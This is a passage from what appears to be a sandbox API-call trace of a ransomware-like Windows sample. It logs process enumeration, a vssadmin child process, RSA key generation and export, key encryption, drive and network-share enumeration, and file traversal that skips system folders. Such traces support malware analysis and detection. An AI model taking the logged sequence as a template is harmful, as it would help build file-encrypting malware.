lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.284] lstrcmpW (lpString1="wininit.exe", lpString2="null.exe") returned 1 [0040.284] lstrcmpW (lpString1="wininit.exe", lpString2="nan.exe") returned 1 [0040.284] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.285] lstrcmpW (lpString1="csrss.exe", lpString2="null.exe") returned -1 [0040.285] lstrcmpW (lpString1="csrss.exe", lpString2="nan.exe") returned -1 [0040.285] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.285] lstrcmpW (lpString1="winlogon.exe", lpString2="null.exe") returned 1 [0040.285] lstrcmpW (lpString1="winlogon.exe", lpString2="nan.exe") returned 1 [0040.285] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.286] lstrcmpW (lpString1="services.exe", lpString2="null.exe") returned 1 [0040.286] lstrcmpW (lpString1="services.exe", lpString2="nan.exe") returned 1 [0040.286] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.286] 
lstrcmpW (lpString1="lsass.exe", lpString2="null.exe") returned -1 [0040.286] lstrcmpW (lpString1="lsass.exe", lpString2="nan.exe") returned -1 [0040.286] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.286] lstrcmpW (lpString1="lsm.exe", lpString2="null.exe") returned -1 [0040.287] lstrcmpW (lpString1="lsm.exe", lpString2="nan.exe") returned -1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.288] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.288] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.289] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.289] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.289] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.289] lstrcmpW (lpString1="audiodg.exe", lpString2="null.exe") returned -1 [0040.289] lstrcmpW (lpString1="audiodg.exe", lpString2="nan.exe") returned -1 [0040.289] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.290] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.290] lstrcmpW 
(lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.290] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x310, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.291] lstrcmpW (lpString1="dwm.exe", lpString2="null.exe") returned -1 [0040.291] lstrcmpW (lpString1="dwm.exe", lpString2="nan.exe") returned -1 [0040.291] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.291] lstrcmpW (lpString1="explorer.exe", lpString2="null.exe") returned -1 [0040.291] lstrcmpW (lpString1="explorer.exe", lpString2="nan.exe") returned -1 [0040.291] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.292] lstrcmpW (lpString1="spoolsv.exe", lpString2="null.exe") returned 1 [0040.292] lstrcmpW (lpString1="spoolsv.exe", lpString2="nan.exe") returned 1 [0040.292] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.293] lstrcmpW (lpString1="taskhost.exe", lpString2="null.exe") returned 1 [0040.293] lstrcmpW (lpString1="taskhost.exe", lpString2="nan.exe") returned 1 [0040.293] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.293] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.293] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.293] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x350, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.294] lstrcmpW (lpString1="taskeng.exe", lpString2="null.exe") returned 1 [0040.294] lstrcmpW (lpString1="taskeng.exe", lpString2="nan.exe") returned 1 [0040.294] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.294] lstrcmpW (lpString1="taskhost.exe", lpString2="null.exe") returned 1 [0040.294] lstrcmpW (lpString1="taskhost.exe", lpString2="nan.exe") returned 1 [0040.294] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="notificationvariancefloor.exe")) returned 1 [0040.295] lstrcmpW (lpString1="notificationvariancefloor.exe", lpString2="null.exe") returned -1 [0040.295] lstrcmpW (lpString1="notificationvariancefloor.exe", lpString2="nan.exe") returned 1 [0040.295] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="contribution 
gratis.exe")) returned 1 [0040.295] lstrcmpW (lpString1="contribution gratis.exe", lpString2="null.exe") returned -1 [0040.295] lstrcmpW (lpString1="contribution gratis.exe", lpString2="nan.exe") returned -1 [0040.295] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="supports.exe")) returned 1 [0040.296] lstrcmpW (lpString1="supports.exe", lpString2="null.exe") returned 1 [0040.296] lstrcmpW (lpString1="supports.exe", lpString2="nan.exe") returned 1 [0040.296] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fail.exe")) returned 1 [0040.296] lstrcmpW (lpString1="fail.exe", lpString2="null.exe") returned -1 [0040.296] lstrcmpW (lpString1="fail.exe", lpString2="nan.exe") returned -1 [0040.296] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="wind_fax.exe")) returned 1 [0040.297] lstrcmpW (lpString1="wind_fax.exe", lpString2="null.exe") returned 1 [0040.297] lstrcmpW (lpString1="wind_fax.exe", lpString2="nan.exe") returned 1 [0040.297] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="democrat.exe")) returned 1 [0040.297] lstrcmpW (lpString1="democrat.exe", lpString2="null.exe") returned -1 [0040.297] lstrcmpW (lpString1="democrat.exe", lpString2="nan.exe") returned -1 [0040.297] 
Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="firm_village_specializing.exe")) returned 1 [0040.298] lstrcmpW (lpString1="firm_village_specializing.exe", lpString2="null.exe") returned -1 [0040.298] lstrcmpW (lpString1="firm_village_specializing.exe", lpString2="nan.exe") returned -1 [0040.298] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="bishop flesh anyway.exe")) returned 1 [0040.298] lstrcmpW (lpString1="bishop flesh anyway.exe", lpString2="null.exe") returned -1 [0040.298] lstrcmpW (lpString1="bishop flesh anyway.exe", lpString2="nan.exe") returned -1 [0040.298] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="gather-contact-chess.exe")) returned 1 [0040.299] lstrcmpW (lpString1="gather-contact-chess.exe", lpString2="null.exe") returned -1 [0040.299] lstrcmpW (lpString1="gather-contact-chess.exe", lpString2="nan.exe") returned -1 [0040.299] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="newport_offices.exe")) returned 1 [0040.299] lstrcmpW (lpString1="newport_offices.exe", lpString2="null.exe") returned -1 [0040.299] lstrcmpW (lpString1="newport_offices.exe", lpString2="nan.exe") returned 1 [0040.299] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: 
lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="afterwardsbeginning.exe")) returned 1 [0040.300] lstrcmpW (lpString1="afterwardsbeginning.exe", lpString2="null.exe") returned -1 [0040.300] lstrcmpW (lpString1="afterwardsbeginning.exe", lpString2="nan.exe") returned -1 [0040.300] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="magnet.exe")) returned 1 [0040.300] lstrcmpW (lpString1="magnet.exe", lpString2="null.exe") returned -1 [0040.300] lstrcmpW (lpString1="magnet.exe", lpString2="nan.exe") returned -1 [0040.300] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mitar.exe")) returned 1 [0040.301] lstrcmpW (lpString1="mitar.exe", lpString2="null.exe") returned -1 [0040.301] lstrcmpW (lpString1="mitar.exe", lpString2="nan.exe") returned -1 [0040.301] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="alone.exe")) returned 1 [0040.301] lstrcmpW (lpString1="alone.exe", lpString2="null.exe") returned -1 [0040.301] lstrcmpW (lpString1="alone.exe", lpString2="nan.exe") returned -1 [0040.301] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="station.exe")) 
returned 1 [0040.302] lstrcmpW (lpString1="station.exe", lpString2="null.exe") returned 1 [0040.302] lstrcmpW (lpString1="station.exe", lpString2="nan.exe") returned 1 [0040.302] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="recorded_draws_india.exe")) returned 1 [0040.302] lstrcmpW (lpString1="recorded_draws_india.exe", lpString2="null.exe") returned 1 [0040.302] lstrcmpW (lpString1="recorded_draws_india.exe", lpString2="nan.exe") returned 1 [0040.302] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="netscape industry or.exe")) returned 1 [0040.303] lstrcmpW (lpString1="netscape industry or.exe", lpString2="null.exe") returned -1 [0040.303] lstrcmpW (lpString1="netscape industry or.exe", lpString2="nan.exe") returned 1 [0040.303] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x750, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="monteangelessyracuse.exe")) returned 1 [0040.303] lstrcmpW (lpString1="monteangelessyracuse.exe", lpString2="null.exe") returned -1 [0040.303] lstrcmpW (lpString1="monteangelessyracuse.exe", lpString2="nan.exe") returned -1 [0040.303] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="creative-worse-specially.exe")) returned 1 [0040.304] lstrcmpW (lpString1="creative-worse-specially.exe", lpString2="null.exe") 
returned -1 [0040.304] lstrcmpW (lpString1="creative-worse-specially.exe", lpString2="nan.exe") returned -1 [0040.304] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="elements.exe")) returned 1 [0040.304] lstrcmpW (lpString1="elements.exe", lpString2="null.exe") returned -1 [0040.304] lstrcmpW (lpString1="elements.exe", lpString2="nan.exe") returned -1 [0040.304] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="nottingham_improve_bird.exe")) returned 1 [0040.305] lstrcmpW (lpString1="nottingham_improve_bird.exe", lpString2="null.exe") returned -1 [0040.305] lstrcmpW (lpString1="nottingham_improve_bird.exe", lpString2="nan.exe") returned 1 [0040.305] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement childrens bracelet.exe")) returned 1 [0040.305] lstrcmpW (lpString1="movement childrens bracelet.exe", lpString2="null.exe") returned -1 [0040.305] lstrcmpW (lpString1="movement childrens bracelet.exe", lpString2="nan.exe") returned -1 [0040.305] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="null.exe") returned -1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="nan.exe") returned -1 
[0040.306] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="null.exe") returned -1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="nan.exe") returned -1 [0040.306] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mudpcd.exe")) returned 1 [0040.307] lstrcmpW (lpString1="mudpcd.exe", lpString2="null.exe") returned -1 [0040.307] lstrcmpW (lpString1="mudpcd.exe", lpString2="nan.exe") returned -1 [0040.307] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x97c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.307] lstrcmpW (lpString1="vssadmin.exe", lpString2="null.exe") returned 1 [0040.307] lstrcmpW (lpString1="vssadmin.exe", lpString2="nan.exe") returned 1 [0040.307] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x97c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0040.308] CloseHandle (hObject=0x84) returned 1 [0040.308] CryptAcquireContextW (in: phProv=0x16fadc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x16fadc*=0x444d38) returned 1 [0041.994] CryptGenKey (in: hProv=0x444d38, Algid=0xa400, dwFlags=0x1800001, phKey=0x16f864 | out: phKey=0x16f864*=0x444cf8) returned 1 [0042.439] CryptExportKey (in: 
hKey=0x444cf8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4470b8, pdwDataLen=0x16f868 | out: pbData=0x4470b8*, pdwDataLen=0x16f868*=0x44) returned 1 [0042.439] CryptExportKey (in: hKey=0x444cf8, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x4470b8, pdwDataLen=0x16f868 | out: pbData=0x4470b8*, pdwDataLen=0x16f868*=0xec) returned 1 [0042.439] CryptDestroyKey (hKey=0x444cf8) returned 1 [0042.440] CryptImportKey (in: hProv=0x444d38, pbData=0x447280, dwDataLen=0x44, hPubKey=0x0, dwFlags=0x0, phKey=0xf0301c | out: phKey=0xf0301c*=0x444cf8) returned 1 [0042.440] lstrlenA (lpString="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") returned 712 [0042.440] CryptImportKey (in: hProv=0x444d38, pbData=0x447448, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0x16f868 | out: phKey=0x16f868*=0x4470b8) returned 1 [0042.440] CryptEncrypt (in: hKey=0x4470b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x16f888*, pdwDataLen=0x16fadc*=0xec, dwBufLen=0x200 | out: pbData=0x16f888*, pdwDataLen=0x16fadc*=0x200) returned 1 [0042.441] CryptDestroyKey (hKey=0x4470b8) returned 1 [0042.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf02b88, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x80 [0042.442] GetLogicalDrives () returned 0x4 [0042.443] wnsprintfW (in: pszDest=0x447088, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0042.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf02a25, lpParameter=0x447088, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x88 [0042.444] WaitForMultipleObjects (nCount=0x2, lpHandles=0x16f850*=0x80, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0096.135] CloseHandle (hObject=0x80) returned 1 [0096.135] CloseHandle (hObject=0x88) returned 1 [0096.135] CryptReleaseContext (hProv=0x444d38, dwFlags=0x0) returned 1 [0096.135] ExitProcess (uExitCode=0x0) Thread: id = 3 os_tid = 0x998 [0042.445] 
WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0xedfb2c | out: lphEnum=0xedfb2c*=0x47b8f8) returned 0x0 [0046.033] WNetEnumResourceW (in: hEnum=0x47b8f8, lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28 | out: lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28) returned 0x0 [0046.033] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca20, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x0 [0046.039] WNetEnumResourceW (in: hEnum=0x491980, lpcCount=0xedfafc, lpBuffer=0x494a30, lpBufferSize=0xedfb00 | out: lpcCount=0xedfafc, lpBuffer=0x494a30, lpBufferSize=0xedfb00) returned 0x103 [0046.039] WNetCloseEnum (hEnum=0x491980) returned 0x0 [0046.039] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca40, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x4b8 [0060.908] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca60, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x4c6 [0060.909] WNetEnumResourceW (in: hEnum=0x47b8f8, lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28 | out: lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28) returned 0x103 [0060.911] WNetCloseEnum (hEnum=0x47b8f8) returned 0x0 Thread: id = 4 os_tid = 0x99c [0044.549] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0044.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 0x4472f8 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0044.549] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Program Files") returned -1 [0044.549] 